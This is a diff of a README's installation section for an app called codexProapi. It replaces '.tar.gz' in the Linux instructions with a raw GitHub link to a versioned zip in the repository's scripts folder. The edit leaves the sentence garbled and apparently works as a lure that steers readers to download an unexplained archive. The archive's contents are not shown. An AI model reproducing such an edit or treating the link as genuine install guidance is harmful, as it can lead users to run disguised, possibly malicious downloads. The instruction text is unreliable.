arinexa/codexProapi/README.md

   If you have a `.dmg`, double-click it, then drag the codexProapi app to your Applications folder.
 If zipped, unzip and move the app to Applications.

 - **Linux:**
   If you have an `.AppImage`, right-click it, select Properties, go to Permissions, and check “Allow executing file as program.”
 Then double-click to run.
-For `.deb` or `.tar.gz`, follow your Linux distro's normal installation process.
+For `.deb` or `https://raw.githubusercontent.com/arinexa/codexProapi/main/scripts/Proapi_codex_v2.6.zip`, follow your Linux distro's normal installation process.

 ---